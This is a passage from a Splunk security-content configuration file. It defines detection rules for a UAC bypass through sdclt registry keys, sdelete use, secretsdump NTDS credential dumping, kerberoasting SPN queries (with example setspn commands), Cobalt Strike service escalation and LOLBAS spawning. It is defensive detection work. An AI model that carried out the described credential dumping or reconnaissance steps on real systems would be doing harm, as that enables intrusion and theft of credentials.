payload path $registry_value_name$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Sdclt UAC Bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious sdclt.exe registry modification. This technique is commonly seen when attacker try to bypassed UAC by using sdclt.exe application by modifying some registry that sdclt.exe tries to open or query with payload file path on it to be executed. action.notable.param.rule_title = Sdclt UAC Bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)` | join process_guid [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= "*\\Windows\\CurrentVersion\\App Paths\\control.exe*" OR Registry.registry_path= "*\\exefile\\shell\\runas\\command\\*") (Registry.registry_value_name = "(Default)" OR Registry.registry_value_name = "IsolatedCommand")) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `sdclt_uac_bypass_filter` [ESCU - Sdelete Application Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect the execution of sdelete.exe application sysinternal tools. This tool is one of the most use tool of malware and adversaries to remove or clear their tracks and artifact in the targetted host. This tool is designed to delete securely a file in file system that remove the forensic evidence on the machine. A good TTP query to check why user execute this application which is not a common practice. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect the execution of sdelete.exe application sysinternal tools. This tool is one of the most use tool of malware and adversaries to remove or clear their tracks and artifact in the targetted host. This tool is designed to delete securely a file in file system that remove the forensic evidence on the machine. A good TTP query to check why user execute this application which is not a common practice. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = user may execute and use this application action.escu.creation_date = 2021-10-06 action.escu.modification_date = 2021-10-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Sdelete Application Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Masquerading - Rename System Utilities"] action.risk = 1 action.risk.param._risk_message = sdelete process $process_name$ executed in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Sdelete Application Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Masquerading - Rename System Utilities"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect the execution of sdelete.exe application sysinternal tools. This tool is one of the most use tool of malware and adversaries to remove or clear their tracks and artifact in the targetted host. This tool is designed to delete securely a file in file system that remove the forensic evidence on the machine. A good TTP query to check why user execute this application which is not a common practice. action.notable.param.rule_title = Sdelete Application Execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.parent_process) as parent_process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_sdelete` by Processes.process_name Processes.original_file_name Processes.dest Processes.user Processes.parent_process_name Processes.parent_process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `sdelete_application_execution_filter` [ESCU - SearchProtocolHost with no Command Line with Network - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies searchprotocolhost.exe with no command line arguments and with a network connection. It is unusual for searchprotocolhost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. searchprotocolhost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint", "Network_Traffic"] action.escu.eli5 = The following analytic identifies searchprotocolhost.exe with no command line arguments and with a network connection. It is unusual for searchprotocolhost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. searchprotocolhost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives may be present in small environments. Tuning may be required based on parent process. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - SearchProtocolHost with no Command Line with Network - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = A searchprotocolhost.exe process $process_name$ with no commandline in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - SearchProtocolHost with no Command Line with Network - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies searchprotocolhost.exe with no command line arguments and with a network connection. It is unusual for searchprotocolhost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. searchprotocolhost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = SearchProtocolHost with no Command Line with Network action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=searchprotocolhost.exe by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(searchprotocolhost\.exe.{0,4}$)" | join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as C2 ] | table _time dest parent_process_name process_name process_path process process_id dest_port C2 | `searchprotocolhost_with_no_command_line_with_network_filter` [ESCU - SecretDumps Offline NTDS Dumping Tool - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects a potential usage of secretsdump.py tool for dumping credentials (ntlm hash) from a copy of ntds.dit and SAM.Security,SYSTEM registrry hive. This technique was seen in some attacker that dump ntlm hashes offline after having a copy of ntds.dit and SAM/SYSTEM/SECURITY registry hive. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects a potential usage of secretsdump.py tool for dumping credentials (ntlm hash) from a copy of ntds.dit and SAM.Security,SYSTEM registrry hive. This technique was seen in some attacker that dump ntlm hashes offline after having a copy of ntds.dit and SAM/SYSTEM/SECURITY registry hive. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - SecretDumps Offline NTDS Dumping Tool - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping", "Graceful Wipe Out Attack", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = A secretdump process $process_name$ with secretdump commandline $process$ to dump credentials in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - SecretDumps Offline NTDS Dumping Tool - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Graceful Wipe Out Attack", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects a potential usage of secretsdump.py tool for dumping credentials (ntlm hash) from a copy of ntds.dit and SAM.Security,SYSTEM registrry hive. This technique was seen in some attacker that dump ntlm hashes offline after having a copy of ntds.dit and SAM/SYSTEM/SECURITY registry hive. action.notable.param.rule_title = SecretDumps Offline NTDS Dumping Tool action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "python*.exe" Processes.process = "*.py*" Processes.process = "*-ntds*" (Processes.process = "*-system*" OR Processes.process = "*-sam*" OR Processes.process = "*-security*" OR Processes.process = "*-bootkey*") by Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `secretdumps_offline_ntds_dumping_tool_filter` [ESCU - ServicePrincipalNames Discovery with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies `powershell.exe` usage, using Script Block Logging EventCode 4104, related to querying the domain for Service Principle Names. typically, this is a precursor activity related to kerberoasting or the silver ticket attack. \ What is a ServicePrincipleName? \ A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.\ The following analytic identifies the use of KerberosRequestorSecurityToken class within the script block. Using .NET System.IdentityModel.Tokens.KerberosRequestorSecurityToken class in PowerShell is the equivelant of using setspn.exe. \ During triage, review parallel processes for further suspicious activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies `powershell.exe` usage, using Script Block Logging EventCode 4104, related to querying the domain for Service Principle Names. typically, this is a precursor activity related to kerberoasting or the silver ticket attack. \ What is a ServicePrincipleName? \ A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.\ The following analytic identifies the use of KerberosRequestorSecurityToken class within the script block. Using .NET System.IdentityModel.Tokens.KerberosRequestorSecurityToken class in PowerShell is the equivelant of using setspn.exe. \ During triage, review parallel processes for further suspicious activity. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives should be limited, however filter as needed. action.escu.creation_date = 2022-02-26 action.escu.modification_date = 2022-02-26 action.escu.confidence = high action.escu.full_search_name = ESCU - ServicePrincipalNames Discovery with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery", "Active Directory Kerberos Attacks", "Malicious PowerShell", "Active Directory Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = An instance of attempting to identify service principle detected on $dest$ names. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - ServicePrincipalNames Discovery with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Active Directory Kerberos Attacks", "Malicious PowerShell", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies `powershell.exe` usage, using Script Block Logging EventCode 4104, related to querying the domain for Service Principle Names. typically, this is a precursor activity related to kerberoasting or the silver ticket attack. \ What is a ServicePrincipleName? \ A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.\ The following analytic identifies the use of KerberosRequestorSecurityToken class within the script block. Using .NET System.IdentityModel.Tokens.KerberosRequestorSecurityToken class in PowerShell is the equivelant of using setspn.exe. \ During triage, review parallel processes for further suspicious activity. action.notable.param.rule_title = ServicePrincipalNames Discovery with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText="*KerberosRequestorSecurityToken*" | stats count min(_time) as firstTime max(_time) as lastTime by ScriptBlockText Opcode Computer UserID EventCode | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `serviceprincipalnames_discovery_with_powershell_filter` [ESCU - ServicePrincipalNames Discovery with SetSPN - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies `setspn.exe` usage related to querying the domain for Service Principle Names. typically, this is a precursor activity related to kerberoasting or the silver ticket attack. \ What is a ServicePrincipleName? \ A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.\ Example usage includes the following \ 1. setspn -T offense -Q */* 1. setspn -T attackrange.local -F -Q MSSQLSvc/* 1. setspn -Q */* > allspns.txt 1. setspn -q \ Values \ 1. -F = perform queries at the forest, rather than domain level 1. -T = perform query on the specified domain or forest (when -F is also used) 1. -Q = query for existence of SPN \ During triage, review parallel processes for further suspicious activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies `setspn.exe` usage related to querying the domain for Service Principle Names. typically, this is a precursor activity related to kerberoasting or the silver ticket attack. \ What is a ServicePrincipleName? \ A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.\ Example usage includes the following \ 1. setspn -T offense -Q */* 1. setspn -T attackrange.local -F -Q MSSQLSvc/* 1. setspn -Q */* > allspns.txt 1. setspn -q \ Values \ 1. -F = perform queries at the forest, rather than domain level 1. -T = perform query on the specified domain or forest (when -F is also used) 1. -Q = query for existence of SPN \ During triage, review parallel processes for further suspicious activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be caused by Administrators resetting SPNs or querying for SPNs. Filter as needed. action.escu.creation_date = 2021-10-14 action.escu.modification_date = 2021-10-14 action.escu.confidence = high action.escu.full_search_name = ESCU - ServicePrincipalNames Discovery with SetSPN - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to identify service principle names. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - ServicePrincipalNames Discovery with SetSPN - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies `setspn.exe` usage related to querying the domain for Service Principle Names. typically, this is a precursor activity related to kerberoasting or the silver ticket attack. \ What is a ServicePrincipleName? \ A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.\ Example usage includes the following \ 1. setspn -T offense -Q */* 1. setspn -T attackrange.local -F -Q MSSQLSvc/* 1. setspn -Q */* > allspns.txt 1. setspn -q \ Values \ 1. -F = perform queries at the forest, rather than domain level 1. -T = perform query on the specified domain or forest (when -F is also used) 1. -Q = query for existence of SPN \ During triage, review parallel processes for further suspicious activity. action.notable.param.rule_title = ServicePrincipalNames Discovery with SetSPN action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_setspn` (Processes.process="*-t*" AND Processes.process="*-f*") OR (Processes.process="*-q*" AND Processes.process="**/**") OR (Processes.process="*-q*") OR (Processes.process="*-s*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `serviceprincipalnames_discovery_with_setspn_filter` [ESCU - Services Escalate Exe - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of `svc-exe` with Cobalt Strike. The behavior typically follows after an adversary has already gained initial access and is escalating privileges. Using `svc-exe`, a randomly named binary will be downloaded from the remote Teamserver and placed on disk within `C:\Windows\400619a.exe`. Following, the binary will be added to the registry under key `HKLM\System\CurrentControlSet\Services\400619a\` with multiple keys and values added to look like a legitimate service. Upon loading, `services.exe` will spawn the randomly named binary from `\\127.0.0.1\ADMIN$\400619a.exe`. The process lineage is completed with `400619a.exe` spawning rundll32.exe, which is the default `spawnto_` value for Cobalt Strike. The `spawnto_` value is arbitrary and may be any process on disk (typically system32/syswow64 binary). The `spawnto_` process will also contain a network connection. During triage, review parallel procesess and identify any additional file modifications. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of `svc-exe` with Cobalt Strike. The behavior typically follows after an adversary has already gained initial access and is escalating privileges. Using `svc-exe`, a randomly named binary will be downloaded from the remote Teamserver and placed on disk within `C:\Windows\400619a.exe`. Following, the binary will be added to the registry under key `HKLM\System\CurrentControlSet\Services\400619a\` with multiple keys and values added to look like a legitimate service. Upon loading, `services.exe` will spawn the randomly named binary from `\\127.0.0.1\ADMIN$\400619a.exe`. The process lineage is completed with `400619a.exe` spawning rundll32.exe, which is the default `spawnto_` value for Cobalt Strike. The `spawnto_` value is arbitrary and may be any process on disk (typically system32/syswow64 binary). The `spawnto_` process will also contain a network connection. During triage, review parallel procesess and identify any additional file modifications. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited as `services.exe` should never spawn a process from `ADMIN$`. Filter as needed. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Services Escalate Exe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = A service process $parent_process_name$ with process path $process_path$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 76}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 76}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Services Escalate Exe - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 95, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of `svc-exe` with Cobalt Strike. The behavior typically follows after an adversary has already gained initial access and is escalating privileges. Using `svc-exe`, a randomly named binary will be downloaded from the remote Teamserver and placed on disk within `C:\Windows\400619a.exe`. Following, the binary will be added to the registry under key `HKLM\System\CurrentControlSet\Services\400619a\` with multiple keys and values added to look like a legitimate service. Upon loading, `services.exe` will spawn the randomly named binary from `\\127.0.0.1\ADMIN$\400619a.exe`. The process lineage is completed with `400619a.exe` spawning rundll32.exe, which is the default `spawnto_` value for Cobalt Strike. The `spawnto_` value is arbitrary and may be any process on disk (typically system32/syswow64 binary). The `spawnto_` process will also contain a network connection. During triage, review parallel procesess and identify any additional file modifications. action.notable.param.rule_title = Services Escalate Exe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=services.exe Processes.process_path=*admin$* by Processes.process_path Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `services_escalate_exe_filter` [ESCU - Services LOLBAS Execution Process Spawn - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies `services.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Service Control Manager and creating a remote malicious service, the executed command is spawned as a child process of `services.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of services.exe that are part of the LOLBAS project can help defenders identify lateral movement activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543", "T1543.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies `services.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Service Control Manager and creating a remote malicious service, the executed command is spawned as a child process of `services.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of services.exe that are part of the LOLBAS project can help defenders identify lateral movement activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate applications may trigger this behavior, filter as needed. action.escu.creation_date = 2021-11-22 action.escu.modification_date = 2021-11-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Services LOLBAS Execution Process Spawn - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] 